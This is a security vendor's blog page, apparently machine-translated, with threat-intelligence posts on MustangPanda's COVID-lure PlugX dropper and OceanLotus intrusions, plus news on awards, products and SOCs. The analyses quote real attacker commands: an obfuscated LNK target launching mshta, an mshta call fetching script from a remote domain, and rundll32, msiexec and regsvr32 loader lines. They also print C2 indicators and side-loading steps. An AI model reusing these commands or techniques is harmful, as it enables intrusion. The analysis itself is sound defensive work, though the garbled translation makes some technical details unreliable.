Author: Aishee

MustangPanda – COVID 19 Malware
07 Mar

I / Introduction

Recently, due to the complicated development of COVID 19, many hacker groups took advantage of this to conduct APT campaigns aimed at organizations around the world, as well as appear campaigns in Vietnam.

Recently taking advantage of the stressful situation of the COVID-19 influenza, the malicious code similar to those developed by the Panda hacker group was found to impersonate three government notices about the outbreak. to deceive users. The malware was injected in a word file with the title: "Chi Thi thuong nguyen xuuc phuc" to deceive users, this code is currently collected by us through the CMC Threat Intelligence system.

Through this malicious pattern Threat Intelligence system is involved with some of the recent samples that we have warnings about.

CMC WARNING NEW APT CAMPAIGN ADVANTAGES UNIKEY ATTACKING USERS IN VIETNAM

CMC CYBER SECURITY ANALYSIS OF LNK MALWARE FORM OF APT PANDA GROUP

 

II / Detail

FILE LNK

The sample file is a shortcut file with the extension ".lnk" hidden as a winword file to deceive users because the ".lnk" extension will be hidden by Windows. However, this winword file uses a suspicious target. Normally the shortcut target target usually points to a destination folder or file, but the target of this template contains the command with the form:

%comspec% / c for %x in (%temp% = %) do for / f "delims ==" %i in ('dir "%x \ Chi Thi thuong nguyen xuan phuc.lnk" / s / b'wind) start m%wind -1,1%hta.exe "%i"

The above code was obfuscate using the variable %comspec% instead of directly calling the string "cmd.exe" and the "s" in the file name mshta.exe was obtained by cutting the last character in the variable "%windir%" (usually C: \ Windows). Mshta.exe is a microsoft application developed to take advantage of fast application building through html, css, vbscript, javascript. Using mshta and the .hta file format, you can open an html page as an application. The hta file format is the same as the html file. By adding a tag inside the html file we have the hta file that can be opened via the mshta application.

However, the hta file may be inserted before its header. Taking advantage of this, the attacker pre-inserted an lnk file with the command to open itself with mshta.exe to execute the embedded .hta file. When the user opens the lnk file, will execute the command in the target of the lnk file and execute the msha.exe file to open itself.

FILE HTA

By default, mshta.exe can execute both javascript and vbscript embedded in hta files using related dlls. The hta file that is embedded when opened will have the following properties: minimize, not shown on the taskbar, no menu and caption. Its sole task is to execute malicious vbscript code.

When vbscipt is executed, this script decodes and stores into %TEMP% folder 3 binary files in base64 and 1 document file.

The document file is then opened for the user.

When this attack uses PLUGX RAT will be executed:

3.exe file is actually a clean file, but when executed it will load up a malicious dll file

To do this, the attacker only needs to find a dll loaded by the LoadLibrary function in the 3.exe file (in this case http_dll.dll), then create a malicious dll file with the same name as the parameter of the LoadLibrary function. and put it in the same directory as the 3.exe file. When calling LoadLibrary, 3.exe will find the dll in the same directory first and load it up.

When "http_dll.dll" is loaded, it will redirect the execution of the PE file to a function in the DLL by changing the memory property on the memory of the PE file via the VirtualProtect API and replacing the code with a pair of push commands. , ret.

At the function of malicious DLL will read file http_dll.dat in the same directory. The content at the beginning of this dat file is a string with null-terminated and data. This string will be used to be the decryption key for the data portion of the dat file.

After that, the malicious code will create a new memory area to contain the decryption process conducted by the xor algorithm with the string key in the dat file as above. The malware continues to change the properties of this new device with the PAGE_EXECUTE_READWRITE property and execute shellcode at this address.

The decoded content is a RAW PE file, but it has been cleverly integrated into a shellcode, starting from offset 0. This shellcode serves as a loader, load this raw PE file to be able to execute OK.

First, shellcode finds the address of kernel32.dll and then fetches the functions LoadLibray, GetProcAddress, ZwFlushIntructionCache, VirtualAlloc by comparing the hash of the names of the functions that are exported by kernel32.

Then, Loader reads the header of the PE file, maps the sections to the corresponding memory areas, reallocates some addresses and resolves the Import Address Table of the file. Once completed, the program execution flow will be passed to the DllMain function of this PE file.

Final Payload

Here, the malicious code will take a number of paths to use, then decrypt a data section to use.

The decoding result is a number of strings including autorun key name, ip c & c server. The malicious code then proceeds:

  • Make a copy of the three executable files to the user's profile directory or alluserprofile if there are sufficient administrator rights.
  • Add and lock autorun to activate the executable file which has just been dropped when restarting the computer. Also relaunch itself if this is its first run. The malware distinguishes this by inserting another parameter to it at subsequent runs.
  • Create a mutex, connect to the server to receive commands from the server.
  • Creating a backdoor allows an attacker to execute commands remotely.
  • Support many different commands including upload file, folder, list folder, read file, get computer information, user, ...

3. Conclusion

By using various attack and disruptive techniques during execution, it is shown that the person behind the malware development has invested a lot of time in researching the target and developing the attack method accordingly. . APT is a malicious attack, carefully invested to steal important information and cause damage to the organization. To prevent APT attacks, always prepare new precautions and ongoing monitoring to ensure the security of users and organizations as well.

HASH

SHA256: BBBEB1A937274825B0434414FA2D9EC629BA846B1E3E33A59C613B54D375E4D2

MD5: 60C89B54029442C5E131F01FF08F84C9

SHA1: 52873A2C81B1F462CDDF3C86B2103F74EF56F91E

C: \ Users \ admin \ AppData \ Local \ Temp \ 3.exe:

C3159D4F85CEB84C4A0F7EA9208928E729A30DDDA4FEAD7EC6257C7DD1984763

C: \ Users \ admin \ AppData \ Local \ Temp \ http_dll.dll:

79375C0C05243354F8BA2735BCD086DC8B53AF709D87DA02F9206685095BB035

C2

DOMAIN vietnam.zing.photos

IP 104.160.44.85

By ManhChich - UraSec Team - CMC SOC Center

Tình hình tấn công của nhóm Oceanlotus định danh xuất phát từ Việt Nam tại Trung Quốc
18 Dec

In the first half of 2019, according to Tencent's cybersecurity intelligence center, the OceanLotus group made a public announcement. The targets of this organization are diverse, including government agencies, maritime authorities, diplomatic agencies, large state-owned enterprises, scientific research organizations and a number of private enterprises. China's big.

Through tracking, Tencent discovered that a large number of domestic targets were attacked by this group and that the entire intranet of the target was occupied, able to identify a large amount of confidential information and information. Stolen server configuration. The attackers appear to be very familiar with China as well as understanding China's hot questions and government structure. For example, when a tax reform was just launched, a tax reform plan was immediately used as the subject of an attack.

Sea Lotus (OceanLotus), also known as APT32, is a cyber attack organization identified by many organizations as coming from Vietnam. Since its inception, the group has carried out attacks on China, as well as many other countries around the world.

The attack methods have not changed much from the first detection, but there are some small improvements including attack decoys, payloads, bypassing of security layers ... etc. still in use. After gaining control of the machine, an attacker will scan the entire network. This also shows that APT attacks will not stop until it reaches its goal. As long as the target is valid, the attack will get stronger.

Characteristics of the attack

Attack by phishing email

Sea Lotus through sending fake emails about reputable organizations, users are easily fooled into downloading malicious files themselves. Throughout 2019, lots of phishing emails were sent, such as the following:

The accounts used to send phishing emails are usually NetEase's mailbox. Types of hacked accounts are usually: Sun ** @ 126 [.] Com, Yang ** @ 163 [.] Com, insert ** @ 126 [.] Com ...

Diversify types of decoys
The team used to diversify the bait for the attack and almost all the bait was used. In addition to the malicious Ink, doc, and compressed files of WinRAR ACE (CVE-2018-20250) are mentioned in many reports.

Malicious file as doc:

Decode Chm file

Winrar flaw (CVE-2018-20250)

Various ways to download files
Due to the variety of decoys for phishing, the method of downloading malicious files also varies.

 Direct execution

The executable file is disguised as a DOCX File, with the icon of microsoft word, used to trick users into downloading it. After the user has downloaded DOC file and opened it. After the File opens, the information in the document file is disturbed, enticing the victim to activate the macro code in the document file so that the content within the document can be viewed. In fact, after macros are enabled, normal content is still not displayed

Use Rundll32 to download malicious dll
After executing the malicious code, it will call and execute the actual malicious code {1888B763-A56C-4D4B-895C-2092993ECCBA} in the C: \ User \ Administrator \ AppData \ Local \ Microsoft folder, following That uses Rundll32 to execute the dll:

"C: \ Windows \ system32 \ rundll32.exe" "C: \ Users \ ADMINI ~ 1 \ AppData \ Local \ Microsoft \ {1888B763-A56C-4D4B-895C-2092993ECCBA} .dll", Register
Macro
Using a Macro to execute and obfuscated Macro code:

Office memory executes malicious shellcode
By Macro code, decode shellcode directly in Office and create a thread to execute in memory:

Use the DLL
Using DLL (Side-Loading) DLL technique to execute, download malicious files:


 Enforcement

Register a malicious DLL as a system component to execute:

Embed command file
Chm file will execute, it prompts to execute ActiveX code:

Script content of file:

However, due to encryption issues, chm is truncated after opening:

 

After decompression, the original content is as follows:

Continuous attacks use scheduled tasks
After chm is executed, the bcdsrv.dll file will be released under %AppData% \ Roaming and then a scheduled task called WeeklyMaintenance will be created:

Execution command:

C: \ Windows \ System32 \ msiexec.exe -Y

C: \ Users \ Administrator \ AppData \ Roaming \ bcdsrv.dll

Bcdsrv.dll is a really malicious file.

Ink called mstah to make

Detailed analysis of Ink technique called mstah

Once executed, the command is called:

C: \ Windows \ SysWOW64 \ mshta.exe http://api.baidu-json.com/feed/news.html

And new.html is actually a Vbs file that is a file containing executable code.

Use odbcconf.exe to download the file
Odbcconf.exe is a file included with the system. This file can be used to execute the dll file and because the server process is a system file, it may get rid of some security software:

WinRAR ACE vulnerability (CVE-2018-20250)
The compression package with this vulnerability can be structured as follows: In addition to extracting the normal files after decompression, the startup folder (C: \ Users \ Administrator \ AppData \ Roaming \ Microsoft \ Windows \ Start Menu \ Programs \ Startup) publishes a self-extracting file:

This file is a self-extracting program. On startup, it will issue the file {7026ce06-ee00-4ebd-b00e-f5150d86c13e} .ocx, then issue the command:

regsvr32 / s / i {7026ce06-ee00-4ebd-b00e-f5150d86c13e} .ocx

Multi-load attack
In the latest attack, Sea Lotus used a Multi-load attack. In previous attacks, after decoding the shellcode, the RAT was finally executed directly, such as:

We found that after decoding the shellcode, the shellcode is downloaded and executed first. If the download fails, the pre-installed RAT is loaded:

This makes attack activities richer and more diverse and also controllable.

The circumvention of security software
Sea Lotus also uses a variety of methods to combat security software, mainly:

Use the DLL to execute
Use the executable system file
Can refer to as odbcconf.exe.

Execute shellcode directly in the office
Add junk data to the file to expand the size.
To prevent files from being collected by security vendors, Sea Lotus has intentionally added a large amount of junk data to the resources of certain files to expand the file size.

If a file is full of junk data, the file size is up to 61.4 MB (64,480,256 bytes):

Create a backdoor
The backdoor file is encrypted and customized according to the computer's properties. Therefore, the hash file on each machine is different and cannot be done without information regarding the machine that contains the backdoor. Even if the malware is found by security vendors, as long as there is no data related to the malicious computer, the payload cannot be decoded.

Disguise for CnC connection
According to configuration information, various connections and camouflage can be made, and C2 is assembled and analyzed. CnCs are usually structured (xxx is the C2 configuration):

{rand} .xxx

www6.xxx

cdn.xxx api.xxx

Fake HTTP Headers:

Custom backdoor
One of the most impressive techniques used by Sea Lotus was in 2019 (mostly backdoor use in phase 2). This technique has been recently published with malicious files released by each victim machine encrypted using the relevant computer properties (such as the hostname) of the victim and executed. We need part of this information, otherwise we can't decode it.

Therefore, each malicious file released is different and even if it is found by the security provider, as long as there is no victim's related data, the actual payload cannot be decoded.

The backdoor is also executed regarding files and processes including: AdobeUpdate.exe + goopdate.dll, KuGouUpdate.exe + goopdate.dll, XGFileCheck.exe + goopdate.dll, SogouCloud.exe + inetmib1.dll and links Other combinations to execute.

The encoding process is:

Through the example below can see, the username was used for encryption.

The victim username is Cao **. It can be seen that the Trojan was created specifically to infect this computer.

Malware
Through the monitoring process, it was noticed that Sea Lotus often used three main types of malware: CobaltStrike's beacon Trojan, modified Trojan Denis and Ghost family. In which CobaltStrike's beacon Trojan and the family Denis Denis are most often discovered, Ghost rarely used.

CobaltStrike:

Denis:

Ghost is modified:

Hacking the network
After a server has been infected with malware via Email Phishing, Sea Lotus will continue its attacks on internal machines. They conduct scans, searches, attacks on internal machines in as many ways as possible.

Get the hash:

Package file:

There will also be tasks created scheduled to download the tools continuously through Powershell:

The malicious file was detected as goopdate.dll.

Some other activities

During the tracking process, several similar attacks were found as Sea Lotus attacks such as:

The malicious code was eventually executed by two file types:

Beacon payload created by CobaltStrike.
The remaining payload block numverse_http is used by metasploit.
In addition, the CnC of these attacks is often detected in China:

Although there have been recent attacks similar to the actions of Sea Lotus, there are also behaviors that are not the same as that of the SeaLotus.

Summary of Sea Lotus
Sea Lotus is one of the most active APT groups in recent years, regularly attacking areas in China and countries around the world. Many cybersecurity companies have consistently made reports about recent Sea Lotus attacks. This group of Sea Lotus is currently showing no signs of stopping, they are constantly updating attack technologies and techniques, causing a lot of difficulties for security activities. Therefore, users need to increase security awareness, not arbitrarily executing attachments of unknown emails and not be fooled by phishing messages.

Safety recommendations

  • To raise awareness about security, do not open attachments of unknown emails, unless the source is reliable and the purpose is clear, it is not easy to activate Office macros.
  • Install patches and operating system patches for important software such as Office in a timely manner.
  • Use Antivirus software to prevent possible attacks like a Trojan horse.
  • Users and businesses should deploy an early threat detection system like SOC. The SOC system is currently the first choice of security houses.
    The related IOC 

MITRE ATT & CK

Source: mp.weixin.qq.com

RDoS ATTACKS BY FAKE FANCY BEAR
05 Dec

Recently, on Threat Intelligence collected some information about ransom denial-of-service (Ransom denial-of-service) attacks, the attacker asked for ransom for the victims to not be attack.

Those attackers extorted money from bullies by sending emails threatening the victims. Most attackers take the group's name  Fancy Bear to take the reputation of this group to threaten the victims with fear. Attackers posing as the infamous Fancy Bear threatened to launch a DDoS attack if the ransom was not paid. In some cases, attackers have made small DDoS attacks to prove their capabilities and validate threats. The attacks are also confirmed by other security researchers.

In the same phase, CMC Cyber Security received support requests from an organization when they received the same threatening email

 

Some organizations that received this threat email also had a demo DDoS attack on their servers.

Vector attack (floods) uses protocols UDP and ICMP , especially the attacker was using UDP / 3283, this is a newly discovered attack vector on 06/2019.

Port UDP / 3283 is used by the protocol Apple Remote Desktop Application (ARD) and ARMS service.

Fancy Bear, also known as APT28 (Sednit group, Sofacy, Pawn Storm, Strontium, Tsar Team, TG-4127, Group-4127, TAG_0700, Swallowtail, Iron Twilight, Group 74) has been operating since 2004, Fancy Bear is an organization hackers specialize in attacking large organizations and governments with APT campaigns.

Can confirm is the group Fancy Bear has nothing to do with ransom denial-of-service (RDO) campaigns, their goal is mostly to crack and spy, while their target is to spend money on something Fancy Bear sponsored, just a bit of a threat to using social engineering.

The source ip is used by the attacker to use random for UDP Flood during the attack RDoS

CMC Cyber Security will only be partially public, if you want more please contact the details.

There are many methods to mitigate this type of DDOS attacks and it is not too difficult to implement. We will continue to apdate the specific details as soon as possible.

VNISA trao giải Sản phẩm an toàn thông tin mới xuất sắc 2018 cho CMC Infosec
10 Sep

VNISA has just awarded the title of information security products and services in 2018 to CMC Infosec with 3 prizes including: High-quality security products, typical security services and excellent new information security products 2018.

VNISA awarded the title of information security products and services in 2018 to businesses.

Organized under the auspices of the Ministry of Information and Communications, the program voted "High-quality Information Security (ATTT)" and "Typical Information Security Services" as an annual activity organized by the Vietnam Association of Information Security (VNISA) ) implemented since 2015 to evaluate, recognize and honor good quality ATTT products and services. The event was held at the International Conference on Vietnam Information Safety Day 2018. The new feature of this year's program is that the Voting Council unanimously assess and propose the certification of the title "Newly released ATTT product". identity ”to encourage new and highly innovative security food products.

At the ceremony of announcing and awarding the voting title on the morning of November 30, 2018, Mr. Vu Lam Bang, Director of CMC Infosec Product Research & Development Center, represented by CMC Infosec Company, received all 3 awards: high-quality security products "," Typical Security Services "and" Excellent New Security Products "2018.

The titles of "High-quality Security Products 2018" and "Typical Security Services 2018" are evaluated and voted according to the main criteria including application demand and efficiency, technology, product quality and market. and support services, market dominance. Two anti-malware solutions for CMC Internet Security Enterprise (CISE) and CMC Infosec penetration testing service have been awarded these two titles. In particular, CISE solution is integrated with Artificial Intelligence (Artificial Intelligence) to detect abnormalities, analyze and identify behavior of malicious code, which is a solution being researched and developed by CMC Infosec.

Notably, the new point of this year's voting program is adding the title "Excellent New Security Product" to encourage new and highly innovative security products. Right in the first year of the award, CMC NextGen SOC's new generation Information Security Management Center received the title. SOC (Security Operation Center) is a center in an internal system that monitors, detects, quarantines and solves incidents and is responsible for the security and safety of network devices and equipment. security, servers or workstations. CMC NextGen SOC is a perfect combination of 3 elements: Technology - Process - People to monitor, detect, automatically react to all information security incidents, with outstanding technology combined. AI - Machine Learning and Automation, allowing early detection of abnormal signs. All technologies and processes of CMC SOC are developed and operated by Vietnamese engineers of CMC Infosec.

This year, the members of the Voting Council are all reputable managers and experts from a number of large agencies, organizations and enterprises operating in the field of security, such as the Ministry of Internet Warfare Command. National Defense, Department of Civil Cryptography Management and Cryptographic Product Testing of the Government Cipher Committee, Vietnam Computer Emergency Response Team (VNCERT) of the Ministry of Information and Communications ... Mr. Vu Quoc Thanh, Vice President of VNISA emphasized: “This year's program of the Vietnam Information Security Association selects complete products and services with high quality features on information security, security and origin from Vietnam. owned and owned by Vietnamese enterprises and organizations. This year we have an additional category of Excellent New Security Products because this field in Vietnam is quite new, products may be in the stage of not yet on the market but need to be encouraged to develop. , appropriate investment. In this category, the CMC SOC solution of CMC Infosec has been rated as good and quality by the Council of Votes, so it is promoted in Vietnam market.

Mr. Vu Lam Bang, Director of CMC Infosec Product Research & Development Center, shared at the event: “This year, the organizers have a new prize for differentiated and pioneering products. The first company in Vietnam built its own Center for Information Security Management from start to finish, not procuring technology from either party. Currently CMC SOC of CMC Infosec is also highly appreciated by foreign units. ”

CMC Infosec was established in 2008 with the mission of developing information security products and services for individual and corporate customers, anti-malware solutions and information security services. With a staff of 70 people, bringing together more than 45 leading security and IT engineers, a team of engineers and experts with international qualifications and security certifications such as PCI QSA, ISO 27001 Lead Auditor, CEH ... and experienced in handling a lot of major information security incidents in Vietnam, 100% of products and solutions provided to the market by CMC Infosec are researched and developed by Vietnamese people themselves. , flexible and tailored to the needs of a wide range of customers from the Government, finance, businesses to individual users. CMC Infosec is currently the only Vietnamese member of Asian Association of Malware Researchers (AVAR) and International Computer Security Alliance (ICSA), all products and services provided by CMC Infosec All are rigorously tested to international standards and receive the support of security experts from these prestigious organizations.

Sau Viettel và Bkav, Bộ TT&TT công nhận giải pháp chống mã độc của CMC, Veramine đáp ứng yêu cầu kỹ thuật
10 Sep

The list of anti-malware products meeting the technical requirements under the Prime Minister's Directive 14 has just been added with two solutions of CMC and Veramine. Previously, there were two solutions of Bkav and Viettel that were evaluated and recognized by the Ministry of Information and Communications.

Centralized anti-malware solution CMC Malware Detection and Defense is one of two new products added to the List of anti-malware products that meet the technical requirements under Directive 14 (Artwork: cmc.com.vn)

The Ministry of Information and Communications has just updated the List of anti-malware products that meet the technical requirements under the Prime Minister's Directive 14 May 25, 2018, to improve the capacity to prevent and fight against malicious software ( referred to as malicious code).

Accordingly, there are 2 anti-malware products of 2 businesses that have been evaluated and added to the above list by the Ministry of Information and Communications, including: centralized anti-malware solution CMC Malware Detection and Defense (CMDD) of CMC Cyber Security and Security Limited (CMC Cyber Security) and Veramine Advanced Endpoint Security Suite (VAESS), an active detection, response and defense suite of threats on points end in the network system (including servers, workstations) of Veramine Company.

Earlier this year, the Ministry of Information and Communications assessed and recognized two anti-malware products to meet technical requirements under the Prime Minister's Directive 14, including: overall solutions to prevent viruses for human Bkav Endpoint AI of Bkav antivirus software joint stock company; solutions to detect and prevent intentional attacks Endpoint (Viettel Endpoint Detection & Response - VEDR) of Viettel Network Security Company of Viettel Group.

The anti-malware products of Viettel, Bkav, CMC and Veramine have been assessed and certified by the Ministry of Information and Communications to meet the technical requirements under Directive 14, which are products and solutions that meet the specified criteria. at the Prime Minister's Directive 14 on improving malware prevention and control capabilities, which are: having a function to allow centralized management; 24/7 technical support and solutions, able to react promptly in detecting, analyzing and removing malware; can share malware information and statistical data with the technical system of competent authorities, comply with standards, technical regulations and professional guidance of the Ministry of Information and Communications.

With CMC Malware Detection and Defense, one of the two new anti-malware products added to the List, CMC said that this solution was developed on the basis of CMC Internet Security Enterprise (CISE) and is a solution. support agencies and organizations to detect and defend against the threat of malicious code deployed on workstations with centralized monitoring system. Specifically, the solution has outstanding features such as: shielding the protection of personal computers safely from the risk of attacks from malicious code; monitor abnormal activities that may cause harm on computers; detect vulnerabilities, malware and dangerous connections.

At the same time, the active monitoring system from CMC Cyber Security allows to identify and immediately identify risks to customers; support and rescue services to minimize risks to customers when attacks occur; provide information security status reports to customers quickly, promptly and completely.

As for Veramine Advanced Endpoint Security Suite (VAESS) from Veramine, information from Cyberlab - the distributor of this solution in Vietnam, says VAESS has the ability to collect diverse information from the core level. The operating system reaches user sessions to identify any suspicious behavior on endpoints.

The suite of solutions also uses a variety of flexible mechanisms to respond to detected abnormal behavior such as interrupting, pausing processes, sessions or quarantining an endpoint, a process from a connection. network; carry out active defense by creating a trap system for malicious code and hackers on endpoints in order to monitor and prevent the activities of hackers and malicious code on these endpoints.

In addition, VAESS ensures the ability to provide sufficient evidence during the forensics process, as well as adds other advanced features to combat internal threats such as people management. user, data and peripherals.

In particular, VAESS supports a variety of platforms including Windows versions, Linux distributions and will soon be supported on MacOS.

Giải bài toán xây dựng Trung tâm điều hành An ninh mạng cho khối Ngân hàng
10 Sep

Network Security Operations Center (SOC) is a "not strange but still new" concept to agencies and organizations in Vietnam, especially the banking sector. So what is the approach to build an effective SOC, consistent with the process of digital development of Vietnamese Banks?
Network Security Control Center (SOC) - "not strange but still new"

In developed countries in the region such as Japan, Singapore, Hong Kong ... the construction and operation of SOC in order to comprehensively control and improve the defenses of IT systems of organizations have been paid much attention. Since 2004, SOC has now become an integral part of all activities of government organizations, multinational corporations and large banks. According to Gartner's report, by the end of 2019, there will be about 50% of large Asian corporations to implement security management activities through SOC.

Grasping this trend and indispensable demand, from the last 2 years, Vietnamese banks have planned to develop SOC. However, the "not strange" with the concept of SOC can not confirm that the bank is "used to" and knows how to operate a complete SOC. In fact, banks have encountered a number of problems.

Firstly, in terms of technology, some banks have initially invested in network security monitoring systems (SIEM) and purchased equipment and technologies from many different companies, leading to decentralized SOC operation and management. and asynchronous. Continuously updating new attack methods and technologies is also a challenge for non-specialized security units. Secondly, in terms of human resources, banks have begun to focus on full-time personnel, however, encountering difficulties in training and keeping high-quality human resources. Third, the investment budget is too great. It is estimated that the investment costs include SIEM, Forensis, Log / Backup solutions, hardware and monitoring equipment for digital surveys at about US $ 1,300,000. This cost does not include annual operating, troubleshooting and management costs.

Outsourcing SOC services - Effective time, cost savings, optimal resources

According to Mr. Ha The Phuong, Deputy General Director of CMC InfoSec - the construction and development unit of CMC NextGen SOC, when analyzing the development level of SOC, experts will be divided into 6 levels. Specifically: Level 1 - with IT department personnel or software to monitor the security status; Level 2 - partially integrated in Network Operations Center (NOC); Level 3 - there was SOC, technology and reporting operations were separated from the IT department; Level 4 - solve problems on resources (development, analysis, troubleshooting); Level 5 - take control of identified threats; Level 6 - combination of prevention, surveillance, detection, quick response and continuous improvement.

In Vietnam, reaching level 5 existing CMC NextGen SOC. In addition to controlling the identified threats, this center of CMC also integrates artificial intelligence (AI), the first Automation technology in Vietnam and has partners to assist in combating threats. new danger; DevOps team and consultants meet the special needs from organizations and banks.

Therefore, the most reasonable plan for banks at this time is to outsource the SOC service package (SOC-As-a-Service) or if they already have SIEM system, they should cooperate with a service provider. Other SOC (Consultancy) cases - provide advice on management manpower and process instead of developing an internal SOC (In-house SOC). In the case of (Hybrid), when the bank has invested in a technology system, SOC service providers can integrate their own solutions into ensuring compatible operation, offering handling procedures. incidents and providing resources ... However, the best is still the choice to outsource the SOC service package. At that time, the bank would choose the most comprehensive and appropriate service provider, available technology, experts, specialized personnel ... and solve the problem of investment cost when reducing from 6 to 12 times the cost of self-developing the system and minimizing risks when system administration is more centralized.

Based on the reality of consulting and deploying outsourcing SOC services to banks, Mr. Phuong said: “The outsourcing of SOC services is completely consistent with the trend of moving from investment costs to transportation costs. Bankers want to build a sustainable defense system. Not only that, banks will not have difficulty in securing resources when only need a focal point in combination with service provider's reporting, troubleshooting and can still monitor 24/7 ”.